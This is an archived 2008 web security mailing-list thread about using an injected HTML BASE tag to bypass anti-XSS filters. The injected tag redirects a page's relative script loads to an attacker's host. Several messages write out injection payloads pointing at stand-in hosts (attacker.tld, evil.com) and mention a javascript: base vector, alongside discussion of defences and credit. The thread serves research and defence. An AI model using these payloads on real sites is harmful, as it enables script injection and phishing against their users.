[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [WEB SECURITY] Nice little XSS trick

From: "James Landis" <jcl24@xxxxxxxxxxx>
Subject: Re: [WEB SECURITY] Nice little XSS trick
Date: Wed, 16 Jul 2008 13:35:48 -0700

It's almost impossible if the attacker can inject a BASE tag into the HEAD.

It's easy if they, oh I dunno, FOLLOW THE SPEC.

-j

On Wed, Jul 16, 2008 at 12:32 PM, Arshan Dabirsiaghi
<arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx> wrote:
> Yeah, and a typical, unfortunate reaction from sirdarkcat (not typical
> of him, just of the security community in general). It's different
> because it'd be trivially easy for the browser vendors to prevent the
> javascript: technique, but almost impossible to fix this variant.
>
> Arshan
>
> -----Original Message-----
> From: David Byrne [mailto:davidribyrne@xxxxxxxxx]
> Sent: Wednesday, July 16, 2008 3:30 PM
> To: Arshan Dabirsiaghi; Amit Klein
> Cc: websecurity@xxxxxxxxxxxxx
> Subject: Re: [WEB SECURITY] Nice little XSS trick
>
> I need to indulge my vanity :) I posted something similar almost a year
> ago. Granted, I didn't take the time to write it up nicely.
>
> http://sla.ckers.org/forum/read.php?2,14751
>
>
>
>
> ----- Original Message ----
> From: Arshan Dabirsiaghi <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
> To: Amit Klein <aksecurity@xxxxxxxxx>
> Cc: websecurity@xxxxxxxxxxxxx
> Sent: Wednesday, July 16, 2008 8:45:28 AM
> Subject: RE: [WEB SECURITY] Nice little XSS trick
>
> You're too nice - no need to apologize or defer credit. You discovered
> it on your own. If you can't find it in Google, CWE or the OWASP Testing
> Guide, I frankly don't think you can call it public knowledge, and
> therefore it should be publicly discussed.
>
> Arshan
>
> -----Original Message-----
> From: Amit Klein [mailto:aksecurity@xxxxxxxxx]
> Sent: Wednesday, July 16, 2008 10:34 AM
> To: Arshan Dabirsiaghi
> Cc: websecurity@xxxxxxxxxxxxx
> Subject: Re: [WEB SECURITY] Nice little XSS trick
>
> Hi Arshan+list,
>
> Indeed - the same vulnerability. I did google for it, but I didn't
> pick up your site (and RSnake's cheat sheet doesn't list it - now I
> know why).
>
> Anyway - sorry. You deserve full credit for it, of course.
>
> Thanks for the correction and the further information,
> -Amit
>
>
> On 7/16/08, Arshan Dabirsiaghi <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
> wrote:
>>
>>
>>
>> http://i8jesus.com/?p=10 (Jan 2008)
>>
>>
>> I also presented this vector last year at OWASP San Jose when I
> demo'ed
>> AntiSamy as an example of dangerous content that isn't malicious code
> on its
>> own. That's one of the selling points of AntiSamy - it stops not only
> XSS
>> (well, we hope) but also prevents phishing attacks that abuse
> HTML/CSS.
>>
>>
>>
>> I talked about it with RSnake afterwards and he had some crazy reason
> for
>> not putting it on his cheatsheet - claimed it was too much like the
> <base
>> href="javascript:foo();//"> vector. As noted on my blog post, IE7 is
> longer
>> (according to policy) supposed to be honoring <base> tags outside of
> <HEAD>,
>> but FF is still vulnerable. You could use this to hijack anything -
>> stylesheets (more XSS/phishing), images, scripts, etc. The only thing
> <base>
>> won't help you steal as far as resources is anything gathered in
> JavaScript.
>>
>>
>>
>> I think some of the big players had this figured out already (or more
>> likely, just got really lucky). MySpace takes <base href> values,
> base64
>> encodes them, and redirects them through another domain. The flow is
> like
>> this for them:
>>
>>
>>
>> 1.       User puts in <base href="http://evil.com";>
>>
>> 2.       Str = base64("http://evil.com";)
>>
>> 3.       Profile = <base
>> href="http://msplinks.com/redir?<base64encodedStr>
>>
>>
>>
>> Maybe there's a way to abuse that, but I don't think so. And eBay
> doesn't
>> have any relative links after user content, at least when I first
> looked at
>> this last year. They probably both just got lucky. =]
>>
>>
>>
>> Arshan
>>
>>
>>
>> ---------- Previous message ----------
>>
>> From: Amit Klein <aksecurity@xxxxxxxxx>
>>
>> Date: Tue, Jul 15, 2008 at 7:33 AM
>>
>> Subject: [WEB SECURITY] Nice little XSS trick
>>
>> To: Web Security <websecurity@xxxxxxxxxxxxx>
>>
>>
>>
>>
>>
>> Hi list
>>
>>
>>
>> Recently I've been thinking about bypassing anti-XSS filters, and a
> nice
>> little trick occurred to me, which I haven't seen anywhere (e.g. it's
> not on
>> RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does
> mention
>> BASe, but not the trick I describe here). The idea is to use the HTML
> BASE
>> tag to force loading of JS code from the attacker's host. Consider a
> page
>> with XSS vulnerability such as:
>>
>>
>>
>> <html>
>>
>> ...
>>
>> ***XSS code may be embedded here***
>>
>> ...
>>
>> <script src="/foo/bar.js"></script>
>>
>> ...
>>
>> </html>
>>
>>
>>
>> Now, an attacker can inject <base
>> href="http://www.attacker.tld/";>, and next thing you know,
>> the browser (IE, at least) loads the JS from
>> http://www.attacker.tld/foo/bar.js... And the beauty is
>> that there's no "explicit" JS code involved in the payload itself.
>>
>>
>>
>> Note that according to the HTML standard, BASE should be placed in the
> HEAD
>> section
>> (http://www.w3.org/TR/html401/struct/links.html#edef-BASE).
>> This is indeed observed by FF 2, but not by IE (checked IE6).
>>
>>
>>
>> Thanks,
>>
>> -Amit
>
> ------------------------------------------------------------------------
> ----
> Join us on IRC: irc.freenode.net #webappsec
>
> Have a question? Search The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
>
> Subscribe via RSS:
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
> Join WASC on LinkedIn
> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>
>
>
>
> ----------------------------------------------------------------------------
> Join us on IRC: irc.freenode.net #webappsec
>
> Have a question? Search The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
>
> Subscribe via RSS:
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
> Join WASC on LinkedIn
> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>
>

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA

Follow-Ups:
- RE: [WEB SECURITY] Nice little XSS trick
  - From: Arshan Dabirsiaghi

References:
- Re: [WEB SECURITY] Nice little XSS trick
  - From: David Byrne
- RE: [WEB SECURITY] Nice little XSS trick
  - From: Arshan Dabirsiaghi

Prev by Date: RE: [WEB SECURITY] Nice little XSS trick
Next by Date: Re: [WEB SECURITY] Re: Comparisons of Web ApplicationFirewalls
Previous by thread: RE: [WEB SECURITY] Nice little XSS trick
Next by thread: RE: [WEB SECURITY] Nice little XSS trick
Index(es):
- Date
- Thread

Brought to you by http://www.webappsec.org
Search this site